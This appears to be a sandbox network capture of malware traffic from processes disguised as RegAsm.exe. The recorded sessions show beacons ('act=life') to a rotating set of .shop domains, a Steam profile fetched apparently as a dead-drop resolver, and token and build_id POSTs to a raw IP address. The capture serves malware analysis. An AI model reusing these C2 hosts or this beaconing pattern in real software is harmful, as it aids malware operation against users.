2024-09-26 23:49:52 UTC	778	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=q5b9ok101jqsnab2u7hld09lmd; expires=Mon, 20 Jan 2025 17:36:30 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jE17DeXSc%2FCXBEdmxkiFIvseBoDbJgVypXUguM4YnN1qzjp%2FdT33L5ScnhWq5UQ06MYSgeAfuxNlGOyz4%2F73JPtoR4s1D7Vam2SLQhabmWrqnFMJVlaKeHN%2Bu5soTeFS1Bm%2Feg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9727265b5942a1-EWR
2024-09-26 23:49:52 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:52 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49738	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:52 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----GHCAAAAKJJDAKECBGIJE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:52 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 47 48 43 41 41 41 41 4b 4a 4a 44 41 4b 45 43 42 47 49 4a 45 0d 0a 43 6f 6e 74 Data Ascii: ------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------GHCAAAAKJJDAKECBGIJEContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------GHCAAAAKJJDAKECBGIJECont
2024-09-26 23:49:53 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:53 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.8	49739	188.114.96.3	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:52 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ghostreedmnu.shop
2024-09-26 23:49:52 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:49:53 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=i2sdk6mt3umer3cnus3jmpl2nc; expires=Mon, 20 Jan 2025 17:36:31 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Zk%2FwVgflhfk%2FDShutuM2pp5aVhcKq%2B7QGGI9uu7oqiLokD0CvuWxVNORYNi3fuzZhDRJbNxdlbzOEZnOQPq25rRsonEkD9GBo6aiqJ7sAt%2F0X2KgDmMWJ1k51qKm8hjaDYhJlA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c97272c3bc34315-EWR
2024-09-26 23:49:53 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:53 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.8	49740	188.114.96.3	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:53 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: offensivedzvju.shop
2024-09-26 23:49:53 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:49:54 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2m8bo26hg3oahj2asp4pter24m; expires=Mon, 20 Jan 2025 17:36:32 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fbq138V%2FSAPZwP9%2BNiExRP6bFg2zuqsNwOO8dWOtsbKodW5sycbysbqqKauujWYIQ%2FRpnnqf2NReN6tvPLnLMcBO6Q%2F%2FBkPAnVynciUwVtnGCrSbM4L29iGc%2Bq2UV6DmM91Wj3e8"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9727325f4143ee-EWR
2024-09-26 23:49:54 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.8	49741	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:54 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKECFIEBGCAKJKECGCFI User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 499 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:54 UTC	499	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 45 43 46 49 45 42 47 43 41 4b 4a 4b 45 43 47 43 46 49 0d 0a 43 6f 6e 74 Data Ascii: ------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------KKECFIEBGCAKJKECGCFIContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------KKECFIEBGCAKJKECGCFICont
2024-09-26 23:49:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.8	49742	188.114.96.3	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:54 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: vozmeatillu.shop
2024-09-26 23:49:54 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:49:55 UTC	770	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=8psdrh8slaheing6kme6kfe8ek; expires=Mon, 20 Jan 2025 17:36:33 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ee5rE1cD6ORjWVv5alMZ5ISrmxx5eLKIdgF7Rsqa5%2FrqB0jV8OR%2FSvsrYWRhuM9TV4QtABtC%2B9vtCEMF%2B5R7lW4RDejpDQe1dd2G1gfqCg2ofwpzQWmLvumE%2FGIPAglo6EZA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9727385c3d7ca8-EWR
2024-09-26 23:49:55 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:55 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.8	49744	104.21.58.182	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:55 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: drawzhotdog.shop
2024-09-26 23:49:55 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:49:56 UTC	766	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=2eea360ls0qi3oivsgen40d8ti; expires=Mon, 20 Jan 2025 17:36:34 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cEJhZD0Q5gzLnw3list6sxxWQIazdXkVBcGBboWDj51YcBjIEB0SXaNiunic0GWKEx8Qduj4azN0DyskVP32U%2FrUzsW1%2Fld%2B3P0CX6WJxiQcnCoILe5xzTMMKMmOz2b0dakm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c97273efba942ec-EWR
2024-09-26 23:49:56 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.8	49745	5.75.211.162	443	2828	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:56 UTC	277	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DHCBAEHJJJKKFIDGHJEC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 5.75.211.162 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-09-26 23:49:56 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 36 61 37 31 61 30 64 33 37 39 37 38 65 36 64 62 35 61 65 63 65 31 32 35 32 33 65 31 31 62 33 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 63 38 63 65 36 66 34 32 32 61 31 64 39 63 66 33 34 66 32 33 64 31 63 32 31 36 38 65 37 35 34 0d 0a 2d 2d 2d 2d 2d 2d 44 48 43 42 41 45 48 4a 4a 4a 4b 4b 46 49 44 47 48 4a 45 43 0d 0a 43 6f 6e 74 Data Ascii: ------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="token"66a71a0d37978e6db5aece12523e11b3------DHCBAEHJJJKKFIDGHJECContent-Disposition: form-data; name="build_id"6c8ce6f422a1d9cf34f23d1c2168e754------DHCBAEHJJJKKFIDGHJECCont
2024-09-26 23:49:56 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Thu, 26 Sep 2024 23:49:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-09-26 23:49:56 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.8	49746	188.114.97.3	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:56 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: fragnantbui.shop
2024-09-26 23:49:56 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:49:57 UTC	774	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=080hp4c5j0s8g0kg98bs6euquv; expires=Mon, 20 Jan 2025 17:36:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DjYa4Ip5%2FlpskrXYZEbQTa0%2FbxPXbcuY93zupTYrtE7khL%2Bw%2FbKO7jNj6M%2FTnp9n9bccjeBoXtncmCaH2OGPG0h9aRqHIGsTV3PO%2FF%2BdJDLll9ga9T5jzWm9iwUyNTS38USN"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9727465d7e0f37-EWR
2024-09-26 23:49:57 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:57 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.8	49748	188.114.97.3	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:57 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: stogeneratmns.shop
2024-09-26 23:49:57 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:49:58 UTC	772	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=uc17tgtaihkkg0insq0u36jtdp; expires=Mon, 20 Jan 2025 17:36:36 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=chYigH4IJBM8MDJzpExvn1RDX4PtBWAj20Tor3nFaWnVq97wc7j2V8uIgGehF3U%2FPKTDq3RjVZmFb0uv38RbPlnC9EZFu6XXT7aejWZG%2BoKHIVtKO7xKFub%2B4mjGm7ARPPBCabU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c97274c2b130f89-EWR
2024-09-26 23:49:58 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.8	49749	104.21.77.130	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:49:58 UTC	263	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: reinforcenh.shop
2024-09-26 23:49:58 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-09-26 23:49:59 UTC	802	IN	HTTP/1.1 200 OK Date: Thu, 26 Sep 2024 23:49:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=rjaua50tbo44fds2qaguq0pos4; expires=Mon, 20 Jan 2025 17:36:37 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zzKF7Zqa9Vid7gdlXFhQN93yxsMwGu0iQAFND4da9a7%2FF%2BfTi55BlB8dRvcK%2FAJ6PKeWJ59%2Bg7Nq7zuClQbrGEyHXw79vI8fOSs5%2BTwVEBGZA%2FBd1QJ3wp8FIFu56hgBihbP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8c9727521b7442e3-EWR alt-svc: h3=":443"; ma=86400
2024-09-26 23:49:59 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-09-26 23:49:59 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.8	49750	104.102.49.254	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:00 UTC	219	OUT	GET /profiles/76561199724331900 HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Host: steamcommunity.com
2024-09-26 23:50:00 UTC	1870	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Thu, 26 Sep 2024 23:50:00 GMT Content-Length: 34663 Connection: close Set-Cookie: sessionid=20b2f384e9ac703ea9abb409; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
2024-09-26 23:50:00 UTC	14514	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-09-26 23:50:00 UTC	16384	IN	Data Raw: 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69 76 20 72 6f 6c 65 3d 22 6e 61 76 69 67 61 74 69 6f 6e 22 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 5f 6d 65 6e 75 22 20 61 Data Ascii: ernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><div role="navigation" id="global_action_menu" a
2024-09-26 23:50:00 UTC	3765	IN	Data Raw: 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 3c 2f 64 69 76 3e 0d 0a 09 3c 2f 64 69 76 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 63 6f 6e 74 65 6e 74 20 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 Data Ascii: e info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div></div></div></div><div class="profile_content "><div class="p

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.8	49752	104.21.2.13	443	5040	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-09-26 23:50:01 UTC	261	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: ballotnwu.site
2024-09-26 23:50:01 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
